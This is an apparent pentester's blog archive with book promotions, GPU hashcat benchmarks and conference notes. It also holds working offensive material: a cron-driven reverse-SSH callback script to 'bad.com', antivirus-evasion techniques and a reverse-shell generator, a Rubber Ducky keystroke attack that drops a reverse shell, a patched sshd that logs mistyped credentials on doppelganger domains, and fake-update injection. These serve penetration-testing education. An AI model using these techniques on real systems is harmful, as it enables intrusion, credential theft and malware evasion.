Archive for the 'Security' Category

 

The Hacker Playbook 2!

Jun 26, 2015 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed]

The second edition of The Hacker Playbook has been released!  The Hacker Playbook 2 (THP2) takes all the best “plays” from the original book and incorporates the latest attacks, tools, and lessons learned. Double the content compared to its predecessor, this guide further outlines building a lab, walks through test cases for attacks, and provides more customized code.

aaaa

Grab a copy of The Hacker Playbook 2 from Amazon now!
www.amazon.com/dp/1512214566/

To give you a little insight, the book is really a compilation of everything I’ve learned in my pentesting career. You might ask how is this any different… and I thought a lot about that when I was writing the book.

Instead of focusing on a lot of the basic features of tools, I focused on different methodologies I’ve learned and used in my past. Another example is that some of the tools that I do use in the book are commercial tools, such as Burp Suite Professional. In addition, in the reporting sections, I try to get the reader to really produce Customer Reports that are valuable. For example, don’t report a Secure Flag/HTTPOnly Cookie issue as a High if those cookies aren’t being used for the session. I go into more detail about rating your vulnerabilities properly and what really I feel the client is looking for.

So, what’s new? Some of the updated attacks from the last year and a half include:

  • Heartbleed
  • ShellShock
  • Kerberos issues (Golden Ticket/Skeleton Key)
  • PTH Postgres
  • New Spear Phishing
  • Better/Cheaper Dropboxes
  • Faster/Smarter Password Cracking
  • New WIFI attacks
  • Tons of PowerShell scripts
  • Privilege Escalation Attacks
  • Mass network compromises
  • Moving laterally smarter
  • Burp Modules
  • Printer Exploits
  • Backdoor Factory
  • ZAP Proxy
  • Sticky Keys
  • NoSQL Injection
  • Commercial Tools (Cobalt Strike, Canvas, Core Impact)
  • Lab sections
  • And so much more

In addition to describing the attacks that have changed in the last couple years, I have attempted to incorporate all of the comments and recommendations received from readers of the first book into this second book. A more in-depth look into how to set up a lab environment in which to test your attacks is also given, along with the newest tips and tricks of penetration testing. Lastly, I tried to make this version easier to follow since many schools have incorporated my book into their curricula. Whenever possible, I have added lab sections that help provide a way to test a vulnerability or exploit.

Here are the chapter breakdowns (Like a Football Playbook):

  • Pregame: This is all about how to set up your lab, attacking machines, and the tools we will use throughout the book.
  • Before the Snap: Before you can run any plays, you need to scan your environment and understand what you are up against. We will dive into discovery and smart scanning.
  • The Drive: Take the vulnerabilities which were identified from Before the Snap and start exploiting those systems. This is where we get our hands a little dirty and start exploiting boxes.
  • The Throw: Sometimes you need to get creative and look for the open target. We will take a look at how to find and exploit manual web application findings.
  • The Lateral Pass: After you have compromised a system, we will discuss ways to move laterally through the network.
  • The Screen: A play typically used to trick the enemy. This chapter will explain social engineering tactics.
  • The Onside Kick: A deliberately short kick that requires close distance. Here, I will describe attacks that require physical access.
  • The Quarterback Sneak: When you only need a couple of yards, a quarterback sneak is perfect. Sometimes you will get stuck with antivirus (AV); this chapter describes how to get over those small hurdles by evading AV.
  • Special Teams: Cracking passwords, exploits, NetHunter and some tricks.
  • Two-Minute Drill: You have only two minutes on the clock and you need to go from no access to full domain admin.
  • Post-Game Analysis: Reporting your findings.

Grab a copy of The Hacker Playbook 2 from Amazon now!
www.amazon.com/dp/1512214566/

Thanks for the support,
Peter

Password Cracking for Fun and Profit

Dec 27, 2014 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]

With the huge drops in GPUs lately, I decided to revisit my password cracking box and update a couple of the GPUs cards.  In doing so, I ended up putting a whole machine together.  What I bought might be a little overkill for just password cracking, as cracking relies mostly on GPUs, but I wanted something that could also be used for other purposes (and not make me deaf).  I could have gone down the route of building out a 6 GPU case, but it wasn’t reasonable in this setting.

When originally building this new computer, I focused on the GPUs and went with the R9 295×2, which are just two ATI R9 290X GPUs.  This is pretty much the best money can buy and due to the heat of two GPUs, also comes already water-cooled.

My setup:

outside inside

Here are the exact hardware specs:

  • Cooler Master Hyper 212 EVO – CPU Cooler with 120mm
  • Sapphire Radeon R9 295X2 8GB GDDR5 DVI-D
  • THM COMPOUND ARCTIC COOLING AC-MX4
  • Corsair Vengeance Series C70 Arctic White Steel ATX Mid
  • BLU-RAY BURNER LG
  • CORSAIR Vengeance Pro 16GB (2 x 8GB) 240-Pin DDR3 SDRAM DDR3 1600
  • SAMSUNG 840 EVO MZ-7TE500BW 2.5″ 500GB SATA III TLC Internal Solid State Drive (SSD)
  • Intel Core i7-4790K Haswell Quad-Core 4.0GHz LGA 1150 Desktop Processor
  • SILVERSTONE ST1500 1500W ATX 12V 2.3 & EPS 12V SLI Ready 80 PLUS SILVER Certified
  • ASUS MAXIMUS VII FORMULA/WATCH DOGS LGA 1150

It took about an hour to put together and it luckily booted up on the first run.  Just for kicks, I ran Microsoft’s performance rating software and it rated 7.8 out of 7.9.  So close to a perfect score…

79

But what really matters is how it will perform for password cracking.  I downloaded oclHashcat (oclHashcat-1.31) and ran some of the baseline password checks.   Here are the checks that really matter to me:

Hashtype: WPA/WPA2
Workload: 4096 loops, 32 accelSpeed.GPU.#1.: 181.9 kH/s
Speed.GPU.#2.: 189.4 kH/s
Speed.GPU.#*.: 371.2 kH/s

Hashtype: MD5
Workload: 1024 loops, 256 accel

Speed.GPU.#1.: 10563.8 MH/s
Speed.GPU.#2.: 10563.4 MH/s
Speed.GPU.#*.: 21127.2 MH/s

Hashtype: SHA1
Workload: 1024 loops, 256 accel

Speed.GPU.#1.: 3653.6 MH/s
Speed.GPU.#2.: 3811.5 MH/s
Speed.GPU.#*.: 7465.1 MH/s

Hashtype: SHA256
Workload: 512 loops, 256 accel

Speed.GPU.#1.: 1468.0 MH/s
Speed.GPU.#2.: 1470.4 MH/s
Speed.GPU.#*.: 2938.4 MH/s

Hashtype: NTLM
Workload: 1024 loops, 256 accel

Speed.GPU.#1.: 19479.6 MH/s
Speed.GPU.#2.: 21894.3 MH/s
Speed.GPU.#*.: 41373.9 MH/s

Hashtype: NetNTLMv2
Workload: 512 loops, 256 accelSpeed.GPU.#1.: 810.0 MH/s
Speed.GPU.#2.: 811.7 MH/s
Speed.GPU.#*.: 1621.7 MH/s

Hashtype: Kerberos 5 AS-REQ Pre-Auth etype 23
Workload: 128 loops, 32 accel

Speed.GPU.#1.: 55167.2 kH/s
Speed.GPU.#2.: 55643.2 kH/s
Speed.GPU.#*.: 110.8 MH/s

Hashtype: Office 2013
Workload: 100000 loops, 4 accel

Speed.GPU.#1.: 4240 H/s
Speed.GPU.#2.: 4240 H/s
Speed.GPU.#*.: 8480 H/s

Hashtype: MSSQL(2005)
Workload: 1024 loops, 256 accel

Speed.GPU.#1.: 3597.0 MH/s
Speed.GPU.#2.: 3794.0 MH/s
Speed.GPU.#*.: 7391.1 MH/s

Hashtype: MSSQL(2012)
Workload: 256 loops, 256 accel

Speed.GPU.#1.: 571.8 MH/s
Speed.GPU.#2.: 571.7 MH/s
Speed.GPU.#*.: 1143.4 MH/s

Hashtype: PostgreSQL
Workload: 1024 loops, 256 accel

Speed.GPU.#1.: 10501.3 MH/s
Speed.GPU.#2.: 10501.8 MH/s
Speed.GPU.#*.: 21003.1 MH/s

 

For example, we can crack NTLM (Windows hashes) at 41373.9 million hashes a second. The ATI 7970, which had been my favorite these past few years, only ran 15261.7 MH/s. We are looking at almost 3 times the power of that card. My biggest worry of course is heat, as I have heard that the 295×2 cards will stop at 75C. Running different tests and baselines, my GPUs stayed between 50 to 65 degrees. I’ll have to do a little further testing on this.

ex

One hiccup I had with this card was that some hashes caused the GPU drivers to crash. For example, if I tried to baseline SHA-3(Keccak), my driver for this card consistently crashed. More to come on this.

So what’s next? I’m going to take some of the really large hashdumps I’ve done and run them against certain wordlists and investigate the benefits of the PRINCE (http://hashcat.net/tools/princeprocessor/prince-attack.pdf) attack. Stay tuned and don’t forget to pickup The Hacker Playbook: http://www.amazon.com/dp/1494932636/.

Happy Hacking,
Peter

The Hacker Playbook

Mar 26, 2014 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
cover2
I am proud to present the book that I’ve been working on… (drum roll)… The Hacker Playbook: Practical Guide To Penetration Testing.  Feel free to grab your copy here:

http://www.amazon.com/dp/1494932636/

To give you a little insight, the book is really a compilation of everything I’ve learned in my pentesting career. You might ask how is this any different… and I thought a lot about that when I was writing the book.

Instead of focusing on a lot of the basic features of tools, I focused on different methodologies I’ve learned and used in my past. I found that most books only focused on open source tools, but commercial tools, such as Burp Suite Professional, are so beneficial to a tester. In addition, in the reporting sections, I try to get the reader to really produce Customer Reports that are valuable. For example, don’t report a Secure Flag/HTTPOnly Cookie issue as a High if those cookies aren’t being used for the session state. I try to go into more detail about rating your vulnerabilities properly and what I really feel is most beneficial to the client. Lastly, you’ll find the whole book pretty easy to read and I try to give all my little secrets away (and my passion for PowerShell).

Here are the chapter breakdowns (Like a Football Playbook):

  • Pregame: This is all about how to set up your attacking machines and the tools we’ll use throughout the book.
  • Before the Snap: Before you can run any plays, you need to scan your environment and understand what you are up against. We’ll dive into discovery and smart scanning.
  • The Drive: Take those vulnerabilities which you identified from the scans, and exploiting those systems. This is where we get our hands a little dirty and start exploiting boxes.
  • The Throw: Sometimes you need to get creative and look for the open target. We’ll take a look at how to find and exploit manual Web Application findings.
  • The Lateral Pass – After you have compromised a system, how to move laterally through the network.
  • The Screen – A play usually used to trick the enemy. This chapter will explain some social engineering tactics.
  • The Onside Kick – A deliberately short kick that requires close distance. Here I will describe attacks that require physical access.
  • The Quarterback Sneak – When you only need a couple of yards a quarterback sneak is perfect. Sometimes you get stuck with antivirus (AV); this chapter describes how to get over those small hurdles by evading AV.
  • Special Teams – Cracking passwords, exploits, and some tricks
  • Post-Game Analysis – Reporting your findings

Thanks for the Support,
Peter

Drop Box on the Cheap

Oct 27, 2013 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
 

I’m sure you’ve all heard of the PwnPlug or other similar types drop boxes. A drop box is a small lightweight system that you can drop into an environment that will call back to you.  The concept is that you are on a physical penetration test and you are able to social engineer your way into the building.  You get into a conference room or an unused cubical, drop a little system, and leave the building.  Now that drop box will connect back to you and you will have full access into their network.

What I needed in a drop box system:

  • Small powerful device that can be inconspicuously plugged into a network
  • Gives a tester access into the company’s network
  • Contains (and can run) all the necessary tools to perform a penetration test (Nmap, metasploit, aircrack, etc)
  • It has to be Fast/Reliable/Cheap
  • Cheap x2, just in case it gets lost/stolen

Looking at what was available on the market, I was able to find the PwnPlugs, PowerPwn, Raspberry-PI, and Odroid.  Let’s start with PwnPlug/PowerPlug.

Both the PwnPlug and PowerPlug can be purchased at http://pwnieexpress.com/.  These are very aesthetically pleasing devices that look inconspicuous.  One of them looks like a powerplug and the other looks like a surge protector.

Respectively, both devices run 1.2 ARM processor/512MB RAM for $995 for the Pwnplug and $1495 for the Powerplug.  So right away the prices on these devices make them unacceptable to my budget.  Not only are they extremely expensive, they run very weak ARM processors with a little RAM.  Trying to run a huge nmap is going to take down the pwnplug.

I also know a lot of people have also been moving over to the Raspberry-PI because of how cheap it is.  The only problem I had with this is that it runs an ARM11 Processor @700 MHz/256MB RAM.  The specs are way too low to be an effective penetration testing tool, even if you can pick one up for under 50 bucks.

  • pi

After all this searching, I was able to find the Odroid-U2.  You can pick one up from: http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135341370451.  The Odroid-U2 runs a 4x Cortex-A9 @1.7 GHz/2GB RAM ARM processor.  This kills the pwnplug in terms of performance (the only downside is that it doesn’t have a Gig interface).  I included a picture from their site and also a picture of my Odroid all setup.  The best part is the size of this device with all this power.

  • o2o1

This device fits exactly to what I’m looking for:

  • Cheap: Cost $80
  • 4x Cortex-A9 @1.7 GHz/2GB RAM
  • 10/100 Ethernet
  • 2 x High speed USB2.0 Host port
  • Micro-HDMI
  • MicroSD Card
  • Extremely small

Odroid-U2 runs ARM CPU. Why is That Important?  ARM is a simpler architecture, leading to small silicon area and lots of power save features while x86 becoming a power beast in terms of both power consumption and production.  RISC (ARM) vs CISC (x86) Architecture: ARM instructions operates only on registers with a few instructions for loading and saving data from / to memory.  The real reason I wanted to get more into ARM was for all the CTFs.  A lot of them lately seem to be having executables for ARM processors (like the DefCon Quals this year).  It is definitely something I want to dig deeper into.

Now that I’ve selected a device, I need to configure it will all of my tools and to have the device connect back to me.  Luckily for me, Kali has created an image for the Odroid-U2.  You can download the Odroid U2 image from http://www.kali.org/downloads/.  To install this image onto your Odroid you need to:

  • Using any Linux (you can use Kali if you want), plug in your microSD card into your computer
  • Use the dd utility to image the file you downloaded to your microSD card. (In our example, we assume the storage device is located at /dev/sdb. Change this as needed.)
  • dd if=kali-ordoidu2.img of=/dev/sdb bs=1M
  • Now plug this sdcard into your Odroid

Remember, I need this device to connect back to me and some of the best options I could think of are:

  • Call back on TCP 443/53 using SSH
  • Call back over cellular (too expensive)
  • Create Ad-Hoc Wifi Network and Bridge Networks

The easiest to configure was the reverse SSH tunnel back to a server I own.  The diagram below is kind of how I have it setup.  The Odroid will connect back to my SSH server out in the internet and I’ll tunnel back within the SSH shell to have control of my Odroid.

  •  b

 

Setting up my Odroid SSH Server (on the Odroid)

  • apt-get install openssh-server openssh-client sshpass
  • Create SSH keys: ssh-keygen
  • Edit your /etc/ssh/sshd_config and change Strictmodes from Yes to No
  • ssh-copy-id root@127.0.0.1
  • Now I need to create a bash script to connect home

The following is a script on the Odroid that will first look if it has any SSH tunnels to my server and if not, to login to that server.  Once it connects to my server (in this example, bad.com over port 443), it’ll create a reverse tunnel over port 2221.  If I’m on my server, I SSH to 127.0.0.1 over port 2221 and I’ll be able to SSH into the Odroid.

Script (callback.sh)

#!/bin/sh
if ps -ef | grep -v grep | grep bad.com ; then
  exit 0
else
  sshpass -p ‘pass’ ssh -f -N -T -R2221:localhost:22 bad.com -p443 –l user >> /dev/null &
fi

The following cronjob is set on the Odroid to make sure my script will run every 2 minutes.  Remember that my script will check if it already has a tunnel, so we don’t need to worry about it creating more than one tunnel.

Cronjob (crontab –e)

*/2 * * * * /root/Desktop/callback.sh > /dev/null 2>&1

And that’s it.  When I plug this Odroid into the network, it will log into my server on the internet via SSH. All I need to do is SSH to my localhost over the tunneled port, which forwards the  connection to my Odroid’s SSH server.  Now I have full control of the host and have access to all the tools included in Kali.  Have fun hacking!

P.S. I am in the midst of writing a penetration testing book from all of my experiences. If you are interested in being a beta reviewer, please let me know. You can email me at sec < @ > securepla.net. For the rest of you, it’ll be released hopefully in January.

Adventures in IOSland – Analyzing IOS Apps

Apr 21, 2013 in Security

So I’ve been spending a lot of time reversing IOS apps and trying to secure them. In my hunt for bugs, I’ve used your standard set of tools and processes on a jail-broken iPhone. They of course include (in no specific order):

Burp – Standard HTTP(s) Proxy
Cycript – Interpreter that combines ObjC syntax with JavaScript and allows us to connect to an existing process and play with App live
Class-Dump-Z – Extract Obj-c runtine information from Mach-o Files
Mallory – Proxy (hard to use, but great tool!)
otool – Recovering Unencrypted Binaries & Finding Libraries
GDB – Recovering Unencrypted Binaries
Craculous – Create unencrypted binary
lipo – Thin IOS Binaries
IDA Pro – Static Analysis
SQLite Browser – See Sql files
Plist Editor – Read plist files

So this was all pretty standard. For most of the traffic, I just modified the host file on the IOS device, pushed HTTP traffic through Burp Suite Pro, and attacked the application (Mallory for non-HTTP traffic). For static analysis, I grabbed the unencrypted binary, pulled the classes, and the strings. This whole process took a while and there was no easy way to view all this data.

That’s when I ran into an article from Hack in the Box 2013 (http://conference.hitb.org/hitbsecconf2013ams/materials/D2T2%20-%20Chilik%20Tamir%20-%20iAnalyzer%20-%20No%20More%20Blackbox%20iOS%20Analysis.pdf), I thought I’d give it a try.

iNalyzer (https://appsec-labs.com/iNalyzer)

iNalyzer is a great testing framework for IOS applications. There is already a bunch of documentation and videos from the developer, but I thought I’d just give my experiences. I will not disclose any vulnerabilities, but show the processes and some high level findings. I picked up a random application from the appstore and just showed what it could do. From there it’s up to you…

Installation is pretty simple. Take your jail broken device and in Cydia add a source repository for http://appsec-labs.com/cydia. Once complete, look at the packages and you’ll see the newest version of iNalyzer.

Once it’s installed, you’ll see the icon on your IOS device and if you click on it you should see the numbers 5544 on top of it. Go to your web browser on a system on that same network (http://[IP of the Device]:5544) and you should connect to the iNalyzer application.

  Reverse0

So I followed the instructions, dropped down into the app I wanted to reverse, and clicked Package. This gave me a zip file which I extracted. Inside that folder, I opened up the file [appname]/Payload/Doxygen/dox.template with Doxygen. Once Doxygen did it’s thing, it created another folder inside Doxygen called html. If you opened up the index.html file inside the html folder, this is where all the goodies were stored.

Here is Doxygen creating the html files:

Reverse1

The analysis is broken down into a few different categories [Strings, ViewControllers, Info.Plist Contents, Embeded Strings, Classes, and Files]. So what this tool did was first decrypted the binary, ran strings, pulled all the classes/functions, sorted it, and striped out all the files for analysis. What a time saver…

Once you open up the index.html page, this is what you’ll see:

Reverse2

Remember when you had to use otool to pull out all the functions out of IOS apps? Now this makes it almost too easy…

Reverse3

So as I stated before, I won’t disclose any bugs here, but what are some funny things I saw. There were a lot of functions about easter (easter eggs?) and check for winners… interesting. Also, now with the functions list, your can do some real cool stuff with cycript to modify actions live in the app.

Examples of interesting strings within the App.

Reverse6

SQLite databases:

Reverse4

So, I had some problems running the tool with some of my custom applications I was testing. After contacting the developer, I found out that you do have the ability to run these manually by running (ssh’ed in the IOS device): ./iNalyzer5 –direct [Application].

Reverse8

So let me know how it all goes and happy hacking.

-Peter

Hiding Your Shells

Aug 19, 2012 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
 

I’ve been working on a couple of little of side projects and finally had a couple hours to sit down and test some things out.  I’m always looking for better ways to hide my reverse shells (and of course meterpreter) and evade anti-virus.  Through some of the conferences I recently attended, here are a couple of new techniques.

1) Hyperion [http://www.nullsecurity.net/binary.html]

Hyperion is a run-time encrypter for 32-bit portable executables.  Runtime crypter accepts binary executable files as input and transforms them into an encrypted version (preserving its original behavior). When executed, the encrypted file decrypts itself on startup and executes its original content.

In short, to summarize what Hyperion does, is that it encrypts a binary with AES 128.  Usually, you’d have to input the cipher key, but this is where Hyperion does it differently. The newly generated encrypted file doesn’t contain the AES cipher key within its code.  It actually doesn’t even know what it is.  During execution, the encrypted version brute forces through every AES key, then decrypts the PE file in memory and executes it. Sweet!

The concept is really cool, where every file will be unique and even if you try to reverse it (using static methods), you won’t be able to find out the original key (easily at least).  I created some meterpreter reverse shells and encrypted them and when I checked against AV, only about 11/43 picked them up as potentially malicious or encryptor.

The problem is that the stub for Hyperion is not polymorphic and doesn’t change, so it’s easy to pick up.  This tool is just a PoC and I’m sure we could build a unique encryptor using the same type of functionality that won’t be picked up by any AV.

Installing Hyperion:
a) Download Hyperion from nullsecurity’s site: http://www.nullsecurity.net/binary.html
b) Requirements – Download a Windows Compiler http://sourceforge.net/projects/mingw/
c) Run “make” in the extracted Hyperion folder and you should have the binary.

Running Hyperion:
a) crypter.exe <input file> <output file>   –  [ Image ]
b) Execute the encrypted file

Notice when you run the encrypted file, your CPU ramps up to 100% for about 10-15 seconds.  This is the brute forcing of AES keys before decrypting your file. [ Image ]

You can read more about Hyperion at :
http://www.nullsecurity.net/papers/nullsec-bsides-slides.pdf
http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf

2) Python Shells FTW

We all know and love python.  It can pretty much do everything you need it to including making some nice reverse shells.  So I created a little script using some code from David Kennedy (which I’ll link at the bottom) to create a reverse shell and package it into a single file.  Before we can start, we need to install some software:

a) Install Python 2.7
b) Install Pyinstaller
https://github.com/downloads/pyinstaller/pyinstaller/pyinstaller-2.0.zip
–Extract pyinstaller to C:\\pyinstaller-2.0\
c) Install Pywin32
http://sourceforge.net/projects/pywin32/files/pywin32/Build%20217/

Now we can run my little python script Shell_Generator.py Script.  The Shell_Generator.py script does the following:

a) Prompts you for the reverse IP and Ports you want [ Image ]
b) Creates the python reverse shell [ Image ]
c) Uses pyinstaller to create a single executable from the python reverse shell and makes sure not to prompt a console during execution
d) Your new reverse shell is located under : C:\shell\dist\shell.exe [ Image ]

Just put up a netcat listener on the port you specified, send your reverse shell to the victim host, and now you have your shell!!!!

Again, since you created the script through python, it is not detected by any antivirus!  woot woot!

Tools: Shell Generator Script

References: http://www.trustedsec.com/files/BSIDESLV_Secret_Pentesting_Techniques.pdf

-Peter

DEFCON XX

Jul 30, 2012 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
Just got back from Defcon 20!  Another successful Defcon and Bsides filled with hacking, partying, drinking, and just plain out breaking things.  Here are some of the things I found interesting:

1) Moxie’s talk on breaking encryption on PPTP VPNs and WPAv2 was big. He put a website up to use the cloud to crack the passwords from the MSCHAPv2 handshakes. https://www.cloudcracker.com/

2) HD Moore scanned the internet (TCP/UDP/UPNP) every 7 days, put a search page up, and owned the internet. This is SHODAN on steroids.

3) Dave Kennedy talked on abusing SCCM (System Center Configuration Manager) (aka SMS) and pxeboot during pentests to get mass shells across the enterprise. Pretty much every configuration he’s ever seen of SCCM is misconfigured. Tool is now included in SET: https://www.trustedsec.com/downloads/social-engineer-toolkit/. Also, about shell encoding/encryptors to avoid AV 100% of the time (hyperion is awesome… ask me for more details if nerdy and interested).

4) Georgia spoke on andriod pentest framework. https://github.com/georgiaw/Smartphone-Pentest-Framework

5) Don Weber – A SMART METER ASSESSMENT TOOLKIT for testing Smart Meters via the optical port. Tool is called OPTIGUARD, which will only be released to those in the utility field, built in python, and used to test both auth and unauth tests. *Excellent talk for smart meters!!! https://media.blackhat.com/bh-us-12/Briefings/Weber/BH_US_12_Weber_Eye_of_the_Meter_WP.pdf

Want to see all the recorded B-sides videos? Here you go.

http://www.youtube.com/playlist?list=PL6BDB3C7E02162BAB

I recommend you watch number:
5 – Must watch if you are a HD Moore fan boy.
15 – Smart Phone Pentesting
16 – Raphael Mudge is the creator of Armitage and is a great speaker.
20 – Those that are burp fans, this was actually pretty cool. It has potential to be a powerful addon.
21/22 -this is just cool stuff. Fun, if you like researching and breaking captcha.

Additional cool things.
-Ninja Badges this year were cellphones running custom android OS and using their own Cellular Network… omg
-There are too many people at defcon…
-GoldCoast Buffet is 9 dollars and pretty awesome!

AntiVirus – Now You See Me, Now You Don’t

May 15, 2012 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]
So I was on a penetration test and one of my tools was being identified by a certain Anti-Virus vendor. I needed to figure out what string was causing the AV tool to pickup my tool and see if I could modify it. There are many different ways you can go about it.  If you wanted to, you could just run a packer [http://www.virusbtn.com/resources/glossary/packer.xml], but unless you have a custom packer, it could also trigger some AV signatures.  You could also use Metasploit’s msfencoder to encode your executable, but I was looking for something simpler.

So, I literally put this together last night in Python and threw together a front end GUI for it.  What it does is that it takes an executable, an ouput folder, and the byte size to split the file by as requirements.  It takes that executable and makes multiple versions of that file based on the defined size.  Lets say you have a 50k file and you wanted to split the file by 5k.  It will make 10 different versions of that file.  The first one will only be the first 5k of the file (will contain the MZ header and some additional information).  The second file will include the first 5k and include the next 5k of data.  This goes for the rest of the files.

Now we should have 10 different files.  Start with the smallest file (5k) and scan that file with your AV of choice.  Does an AV signature trigger on that file?  If no, keep going through each version of that file.  When you finally do get AV to trigger, you know that something between the last file and the clean file right before it contained the string that the AntiVirus program looks for.

Now that take the diff between the files, open it up in any Hex Editor (I love HxD), make the proper modifications, and now your new executable doesn’t trigger AV. When I get some more time and I’m not sitting at a coffee shop, I’ll put some better pictures up.

The Evade tool was developed completely in Python and Glade was used as the front end.
Want to give it a try: Download Evade
Source: Download Evade Source
Remember it was a quick release and I haven’t really QA’ed it at all.
Questions or Comments about the Tool: Email me at Secure[a@t]securepla.net

Don’t Stick That in There – HID (Human Interface Device)

Feb 05, 2012 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]

You might have heard about teensy or HIDs from a bunch of the security conferences recently, but if you haven’t let me tell you how cool they are.  What is a HID device you might ask?  You can go to Wikipedia’s definition, but in this case, the purpose of the HID device is to emulate a physical keyboard.  I do know that Irongeek did a lot of work with Human Interface Devices (HIDs) www.irongeek.com in the past and demonstrated a number of different attacks in his last couple of talks.  Well at Shmoocon last weekend, I was finally able to pick up one of these devices and played around with it.

 

The Rubber Ducky:  The hardware is an Atmel 32bit AVR Microcontroller AT32UC3B1256 board, with a microsd slot and a usb connector.

When this USB device is plugged into the computer, the computer won’t recognize this as a storage device, but instead as a keyboard.  So what you could do is program this device to type out things that a user sitting at the machine would have done.  The benefit of this is that even with USB auto-run disabled, our exploit will still work as it emulates a keyboard.  No one ever blocks USB keyboards!

The scripting language that is used with this device is called “Duckyscript“.  It is pretty straight forward and easy to code in.  For example:

GUI r
DELAY 50
STRING notepad.exe
ENTER
DELAY 100
STRING Hello World
ALT f
STRING s

The following code presses the Windows Key and R (to get to Run), types in “notepad.exe”, hits enter, write “Hello World” and saves it.  Easy Huh?

Now we have everything we need to start building our HID device attack.  First we need to define exactly what our HID device is going to do when plugged in.  Do we want it to just mess with the person or is our goal to exploit the machine?  There are scripts out there to flip a users screen once plugged in or even start a key logger on that machine.

What I thought would be best, would be to have the device build a reverse shell back to an IP that I control.  The original concept for the code and explanation is from here: http://dabermania.blogspot.com/2011/04/copying-executable-from-teensy-using.html.  Here is my code in the format used for my device to attack a Windows 7 box:  Duckycode.  What the code will do, is the following

  1. Press the ctrl-esc (equivalent to the windows menu key)
  2. Type cmd
  3. Press the menu key (equivalent to right clicking on cmd prompt)
  4. Press “a” to run as administrator
  5. Click yes to run cmd
  6. Copy the Decoder
  7. Copy the Base64 encrypted reverse shell
  8. Create the executable
  9. Execute the new reverse.exe file and the associated port

What I did to setup this attack is configure one box with a listener on port 8080.  This will be the port that the reverse shell will connect back to.  On the Windows 7 box, I didn’t to anything special to it.  In fact the Windows 7 box is fully patched and antivirus is updated.  What happens next is I plug the USB device into my Windows 7 box and it begins to build the code and then execute the reverse shell.  The animated gif below, shows this whole process, with the last frame showing the connection back to my box.

 

 

Of course this attack is visible to anyone watching the screen.  So what might be the scenario to this?  What about a kiosk with no keyboard but USB ports?  Have you ever been to a store where the register had a computer with USB ports facing the customer?  Why not tell the employee to get the manager and while he is gone, plug in this device and bam… exploited box.  You’ll have to get creative with this attack.  Buy Your Own Here

Over and Out.

Doppelganging Your SSH Server

Dec 16, 2011 in Security

The Doppelganger Project

You might remember my last big research project about Typosquatting http://www.wired.com/threatlevel/2011/09/doppelganger-domains/ a very specific type of Doppelganger attack. To recap, lets say your company has an email structure similar to this:

john.smith@us.company.com
john.smith@asia.company.com
john.smith@eu.company.com

What I first do is figure out all the different sub-domains a company might have. I have seen the sub-domains use countries, country codes, departments, cities, and etc. The next step is to verify that these email sub-domains are actually used. Do a couple Google searches and you can easily see how popular those email sub-domains are. After that, I find if the doppelganger domains are available. For example, in this case, these would be the doppleganger domains you might want to purchase:

uscompany.com
asiacompany.com
eucompany.com

Once you find the appropriate doppelgangers, purchase those domains, setup an email servers, enable catchall, and watch misaddressed emails come in. So that was what was from our previous research project and that was extremely successful. I hope if you are a company that has doppelganger domains, that you have purchased them all.

Tracking SSH Attempts

Now I decided to take this one step further. What if I setup an ssh server on those doppelganger domains and monitor attempts? If someone who works for one of those companies tries to SSH to one of their servers, but mistypes it, we might be able to gain their credentials.

First, we would have to set the DNS A record to point all records to a particular IP. For example, I set the A record host to “*” and pointed the host record to my IP address. Any subdomain within the doppelganger will point back to my server. Meaning:

test.uscompany.com
arp.uscomany.com
deadbeef.uscompany.com

All point back to a single IP. Now we need to setup an SSH server that logs both the username and password. For this I have configured a server running Ubuntu 11.10. Since normal sshd won’t record the passwords, we are going to have to modify a version of sshd. I started off by downloading openssh portable 5.9p1, which is the current release.

wget http://mirror.team-cymru.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

To Extract:
tar xvfz openssh-5.9p1.tar.gz

Go into the openssh directory:
cd openssh-5.9p1

We need to modify the auth-passwd.c file before me compile sshd. Here is what I changed below, but I have also included the whole auth-passwd.c file you should replace [https://www.securepla.net/download/auth-passwd.c]:

if(!sys_auth_passwd(authctxt, password))
{
FILE *garp;
garp = fopen("/var/log/sshd_logged", "a");
chmod("/var/log/sshd_logged", 0600);
fprintf(garp,"%s:%s:%s\n",authctxt->user,password,get_remote_ipaddr());
fclose(garp);
}
return (result && ok);

What I did here is when we have an invalid login, write down the username, password, and ip address into a file located in /var/log/sshd_logged.
After replacing the auth-passwd.c file, lets compile and make it:
sudo ./configure --prefix=/opt --sysconfdir=/etc/ssh
make
sudo make install

Now we should have a working version of our new sshd service. To start sshd:
sudo /opt/sbin/sshd

Now you can just run the command:
tail -f /var/log/sshd_logged

ssh_log

And watch the usernames/passwords fly by.

Now some things to help you out.
1) Don’t forget to do some type of port forwarding on your external router if you are NAT’ed.
2) Enable Fail2ban. Unless you want SSH bruteforcers trying passwords all day enable fail2ban. Once a single IP hits too many bad ssh logins in a row, it will temporarily ban that IP. This will help you get rid of false positives
3) I am not a lawyer and this was just for educational purposes. Please check with your lawyer or contact someone like the EFF to see what you can and can’t do.

Don’t Upgrade Your Software…

Sep 29, 2011 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities] 

 Evilgrade:

I finally got some time to play around with Evilgrade (Download Here: Download Evilgrade. You might be asking what is Evilgrade:

“Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.” -http://www.infobytesec.com/

What does this mean to you? Lets say your software tries to go look for an update and instead of downloading the correct update, you man-in-the-middle the connection and send them a malicious update instead.

So infobytesec created a framework to help assist in this type of attack. They state that they have at least 60+ applications that allow full exploitation via updates. Some examples are:

– Notepad++ 5.8.2
– Java 1.6.0_22winxp/win7
– aMSN 0.98.3
– Appleupdate – Mirc 7.14
– Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
